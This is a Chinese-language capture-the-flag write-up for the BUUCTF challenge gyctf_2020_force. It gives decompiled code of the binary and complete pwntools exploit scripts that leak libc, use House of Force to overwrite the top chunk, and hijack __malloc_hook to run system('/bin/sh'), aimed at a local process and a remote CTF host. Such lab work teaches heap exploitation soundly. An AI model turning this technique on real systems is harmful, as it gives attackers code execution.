House Of Force 例题

gyctf_2020_force(House of Force&劫持 malloc_hook)

参考资料:https://tamoly.github.io/2025/07/12/BUUCTF-PWN%E9%A2%98%E8%A7%A3/gyctf_2020_force(House%20of%20Force%E5%92%8Csystem(‘bin%20sh’))/,不得不说这道题坑了我好久,libc 必须使用 BUUCTF 本地的,自己的 libc 还打不通,幸好有这一篇博客,赞

需要注意的是house offorse 只在libc2.23中可用 该漏洞在libc2.27中就被修复了

1773763874720-caa9a109-2b16-4a28-a3ae-bfc7431fed97.png 1773763838362-92869b08-7878-4834-8603-133be3b96021.png

add

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
unsigned __int64 add()
{
  const void **i; // [rsp+0h] [rbp-120h]
  __int64 size; // [rsp+8h] [rbp-118h]
  _BYTE s[256]; // [rsp+10h] [rbp-110h] BYREF
  unsigned __int64 v4; // [rsp+118h] [rbp-8h]

  v4 = __readfsqword(0x28u);
  memset(s, 255, sizeof(s));
  for ( i = (const void **)&unk_202080; *i; ++i )
    ;
  if ( (char *)i - (char *)&unk_202080 > 39 )
    exit(0);
  puts("size");
  read(0, nptr, 0xFu);
  size = atol(nptr);
  *i = malloc(size);
  if ( !*i )
    exit(0);
  printf("bin addr %p\n", *i);
  puts("content");
  read(0, (void *)*i, 0x50u);
  puts("done");
  return __readfsqword(0x28u) ^ v4;
}
1773764149427-8d9dd9d0-7a46-4d53-84bc-0158c1f5b545.png

put

1
2
3
4
5
6
7
8
unsigned __int64 put()
{
  unsigned __int64 v1; // [rsp+8h] [rbp-8h]

  v1 = __readfsqword(0x28u);
  puts(&s_);
  return __readfsqword(0x28u) ^ v1;
}

mmap 申请空间:

1
2
3
4
5
mmap
mmap是memory map的缩写即内存映射
每在物理内存中开辟一块空间 然后利用mmap映射到虚拟内存中
主线程既可用brk又可用mmap,子线程只能用mmap
其次 主线程如果盛情的内存空间过大的话会直接用mmap在mmap段拿到一块大的空间 如果申请的比较小的话直接在data段向上拓展一段空间即可

泄露 libc 基地址

首先申请一个超级大的 chunk 触发 mmap,然后去打印这个 chunk 地址,减去对应偏移获取 libc 基地址。

libc.address 只在知道 libc 文件的时候使用,是 pwntools 里的一个属性,其用途是设置 libc 库在内存中的基地址。一旦这个基地址被设置好哦,pwntools 就能自动计算出 libc 中各个函数和变量的实际地址。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from pwn import *
context.log_level = "debug"
# io=remote('node5.buuoj.cn',28347)
io= process('./force')
elf=ELF('./force')
libc=ELF("./libc-2.23.so")

def add(size, content):
    io.sendlineafter("2:puts\n", "1")
    io.sendlineafter("size\n", str(size))
    io.recvuntil("bin addr ")
    addr = int(io.recv(14),16)
    io.sendlineafter("content\n",content)
    return addr

libc.address=add(0x200000, 'aaa\n')
log.success("libc.address :"+hex(libc.address))
gdb.attach(io)

1773811873428-177b0c5a-dff8-4766-b909-eab8b381457e.png1773812095662-880c6c81-28ad-410f-a62d-aaa2412f4b29.png

0x7f93b0600000 - 0x7f93b03ff010 = 0x200ff0 获取堆块地址与libc 的固定偏移,可以计算我们的 libc 基地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
from pwn import *
context.log_level = "debug"
# io=remote('node5.buuoj.cn',28347)
io= process('./force')
elf=ELF('./force')
libc=ELF("./libc-2.23.so")

def add(size, content):
    io.sendlineafter("2:puts\n", "1")
    io.sendlineafter("size\n", str(size))
    io.recvuntil("bin addr ")
    addr = int(io.recv(14),16)
    io.sendlineafter("content\n",content)
    return addr

libc.address=add(0x200000, 'aaa\n') + 0x200ff0
log.success("libc.address :"+hex(libc.address))
gdb.attach(io)

得到我们的 libc 基地址:

1773812701245-65f7a45a-7004-41a8-ad0e-f47e812be16b.png 1773812736736-134d0ecf-2a6a-496b-9452-fbcde03e005a.png

验证一下,我们打印出来的 libc_address 确实是 libc 基地址。

House of force 修改 top_chunk

有了 libc 基址后,开始使用 House of Force 手法通过溢出去修改 top chunk 的 size,同时把 ‘/bin/sh’ 写入 top chunk。溢出需覆盖到 top chunk 的 size 字段时篡改后的 size 需满足 (size & 1) == 1(即 PREV_INUSE 位为 1),否则 glibc 会认为前一个块空闲,触发合并逻辑,导致利用失败。)

1
2
3
4
5
6
libc.address=add(0x200000, 'aaa\n')+0x200ff0
log.success("libc.address :" + hex(libc.address))

top = add(0x18,b'a'*0x10 + b'/bin/sh\x00' + p64(0xFFFFFFFFFFFFFFFF | 0x1)) + 0x10
log.success("top :" + hex(top))
gdb。attach(io)

地址+0x10 是为了直接覆盖到 size 位

1773813161926-fca0b0d6-2c71-49fc-9bce-981121f79724.png

这里使用 p64(0xFFFFFFFFFFFFFFFF | 0x1) 强制设置PREV_INUSE 标志位

把 ‘/bin/sh’ 写在 0xFFFFFFFFFFFFFFFF 前,以便后面通过 top chunk 调用 ‘/bin/sh’

1773813733544-58c0cbcd-efcb-400a-ac11-248ac142286f.png

往 malloc_hook 中写入 system

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
libc.address=add(0x200000, 'aaa\n') + 0x200ff0
log.success("libc.address :"+hex(libc.address))

top_addr = add(0x18,b'a'*0x10 + b'/bin/sh\x00' + p64(0xFFFFFFFFFFFFFFFF | 0x1)) + 0x10
log.success("top :" + hex(top_addr))

malloc_hook = libc.sym['__malloc_hook']
log.success('malloc_hook :'+hex(malloc_hook))
    
system = libc.sym['system']
log.success('system :' + hex(system))
    
offset = (malloc_hook - 0x20) - top_addr
log.success("offset :" + hex(offset))

先计算 malloc_hook 和 top_chunk_addr + 0x20 之间的偏移,0x20 恰好是上面填充过后的位置

将 top chunk 扩展到 __malloc_hook 附近

1
2
3
addr = add(offset, 'a')
addr1 = addr + offset
log.success("addr1 :"+hex(addr1))

addr1 就是创建新堆之后的 top_chunk 地址

1773824641137-d11bc243-7eaf-414e-a02d-10a5e8c1031d.png 1773824623216-c6470f8e-63ce-4806-8e2a-b298928311cb.png

利用 offset 申请一次堆块:

  • top chunk 会被 延伸到 __malloc_hook 附近
  • addr → 返回 payload 起始地址(下次 malloc 就会覆盖 __malloc_hook)

这里在创建一个堆块,内容是 system ,前面的 memalign_hook 和 realloc_hook 用做堆块头,内容输入开始的地方直接是 malloc_hook

创建内容为 system 的堆块

1
2
addr2=add(0x10,p64(system))
log.success("addr2 :"+hex(addr2))
1773824847814-14de4542-d044-48dd-aef9-f08b55e2232a.png 1773824828916-78c6f54b-21f4-4be6-a3fa-e7f37086a5d7.png

此时可以知道我们的内容就写在了 addr2 当中,也就是把 system 写入了 malloc_hook

再次申请触发 system(‘/bin/sh’);

1
2
3
4
io.recvuntil("2:puts\n")
io.sendline('1')
io.recvuntil("size\n")
io.sendline(str(top))

再次调用 malloc:

  • 申请大小 = top
  • malloc 内部会执行 __malloc_hook(size)
  • 由于我们已经把 __malloc_hook 改成 system,所以实际上执行了:
1
system(top)
  • top 内部之前写了 /bin/sh\x00 → 得到 shell

size 值原本我们给的是数值,会把这个数值给 rdi,现在给的是 top chunk 地址,给 rdi 的值就是 top 的内容

获取 shell

1773826168309-6d258317-b786-4952-b866-37247e0c112d.png

由于 BUU 平台只给了 libc,并没有给相应的 ld 文件,我们只能寻找对应版本的 glibc_all_in_one 进行 patch

打本地自然就需要用自己的 glibc_all_in_one 中的 libc,不过打远程却需要 BUUCTF 官方给的 libc-2.23.so

本地
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
from pwn import *
context.log_level = "debug"
# io=remote('node5.buuoj.cn',25602)
io= process('./force')
elf=ELF('./force')
libc=ELF("/home/kali/Desktop/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so")

def add(size, content):
    io.sendlineafter("2:puts\n", "1")
    io.sendlineafter("size\n", str(size))
    io.recvuntil("bin addr ")
    addr = int(io.recv(14),16)
    io.sendlineafter("content\n",content)
    return addr

libc.address=add(0x200000, 'aaa\n')+0x200ff0
log.success("libc.address :"+hex(libc.address))
# gdb.attach(io)
top = add(0x18,b'a'*0x10+b'/bin/sh\x00'+p64(0xFFFFFFFFFFFFFFFF | 0x1))+0x10
log.success("top :"+hex(top))
# gdb.attach(io)
malloc_hook=libc.sym['__malloc_hook']
log.success('malloc_hook :'+hex(malloc_hook))
system=libc.sym['system']
log.success('system :'+hex(system))
offset = (malloc_hook-0x20)-top
log.success("offset :"+hex(offset))

addr=add(offset, 'a')
addr1=addr+offset
log.success("addr1 :"+hex(addr1))
# gdb.attach(io)
addr2=add(0x10,p64(system))
log.success("addr2 :"+hex(addr2))

gdb.attach(io)

io.recvuntil("2:puts\n")
io.sendline('1')
io.recvuntil("size\n")
io.sendline(str(top))

io.interactive()

远程
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
from pwn import *
context.log_level = "debug"
io=remote('node5.buuoj.cn',25602)
# io= process('./force')
elf=ELF('./force')
libc=ELF("./libc-2.23.so")

def add(size, content):
    io.sendlineafter("2:puts\n", "1")
    io.sendlineafter("size\n", str(size))
    io.recvuntil("bin addr ")
    addr = int(io.recv(14),16)
    io.sendlineafter("content\n",content)
    return addr

libc.address=add(0x200000, 'aaa\n')+0x200ff0
log.success("libc.address :"+hex(libc.address))
# gdb.attach(io)
top = add(0x18,b'a'*0x10+b'/bin/sh\x00'+p64(0xFFFFFFFFFFFFFFFF | 0x1))+0x10
log.success("top :"+hex(top))
# gdb.attach(io)
malloc_hook=libc.sym['__malloc_hook']
log.success('malloc_hook :'+hex(malloc_hook))
system=libc.sym['system']
log.success('system :'+hex(system))
offset = (malloc_hook-0x20)-top
log.success("offset :"+hex(offset))

addr=add(offset, 'a')
addr1=addr+offset
log.success("addr1 :"+hex(addr1))
# gdb.attach(io)
addr2=add(0x10,p64(system))
log.success("addr2 :"+hex(addr2))

gdb.attach(io)

io.recvuntil("2:puts\n")
io.sendline('1')
io.recvuntil("size\n")
io.sendline(str(top))

io.interactive()

更新: 2026-03-18 17:32:16
原文: https://www.yuque.com/idcm/wnemg9/tkc0o0zwuec67fd4